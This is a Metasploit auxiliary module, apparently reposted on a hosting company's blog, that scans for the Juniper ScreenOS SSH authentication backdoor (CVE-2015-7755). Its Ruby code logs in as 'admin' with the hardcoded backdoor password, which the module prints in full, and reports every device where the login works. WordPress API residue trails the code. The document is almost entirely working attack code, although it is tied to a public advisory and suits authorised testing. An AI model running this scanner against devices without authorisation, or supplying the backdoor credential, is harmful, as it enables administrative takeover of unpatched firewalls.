##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
require ‘net\/ssh’<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::SSH<\/p>\n
def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Juniper SSH Backdoor Scanner’,
‘Description’ => %q{
This module scans for the Juniper SSH backdoor (also valid on Telnet).
Any username is required, and the password is <<< %s(un=’%s’) = %u.
},
‘Author’ => [
‘hdm’, # Discovery
‘h00die <mike[at]stcyrsecurity.com>’ # Module
],
‘References’ => [
[‘CVE’, ‘2015-7755’],
[‘URL’, ‘https:\/\/www.rapid7.com\/blog\/post\/2015\/12\/20\/cve-2015-7755-juniper-screenos-authentication-backdoor\/’],
[‘URL’, ‘https:\/\/kb.juniper.net\/InfoCenter\/index?page=content&id=JSA10713’]],
‘DisclosureDate’ => ‘2015-12-20’,
‘License’ => MSF_LICENSE
))<\/p>\n
register_options([
Opt::RPORT(22)
])<\/p>\n
register_advanced_options([
OptBool.new(‘SSH_DEBUG’, [false, ‘SSH debugging’, false]),
OptInt.new(‘SSH_TIMEOUT’, [false, ‘SSH timeout’, 10])
])
end<\/p>\n
def run_host(ip)
ssh_opts = ssh_client_defaults.merge({
:port => rport,
:auth_methods => [‘password’, ‘keyboard-interactive’],
:password => %q{<<< %s(un=’%s’) = %u},
})<\/p>\n
ssh_opts.merge!(verbose: :debug) if datastore[‘SSH_DEBUG’]\n
begin
ssh = Timeout.timeout(datastore[‘SSH_TIMEOUT’]) do
Net::SSH.start(
ip,
‘admin’,
ssh_opts
)
end
rescue Net::SSH::Exception => e
vprint_error(“#{ip}:#{rport} – #{e.class}: #{e.message}”)
return
end<\/p>\n
if ssh
print_good(“#{ip}:#{rport} – Logged in with backdoor account admin:<<< %s(un=’%s’) = %u”)
report_vuln(
:host => ip,
:name => self.name,
:refs => self.references,
:info => ssh.transport.server_version.version
)
end
end<\/p>\n
def rport
datastore[‘RPORT’]end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘net\/ssh’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::SSH def initialize(info = {})super(update_info(info,‘Name’ => ‘Juniper SSH Backdoor Scanner’,‘Description’ => %q{This module scans for the Juniper SSH backdoor (also valid on Telnet).Any username is required, and the password is <<< %s(un=’%s’) = %u.},‘Author’ => [‘hdm’, # Discovery‘h00die …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59363","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59363","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59363"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59363\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59363"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59363"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59363"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}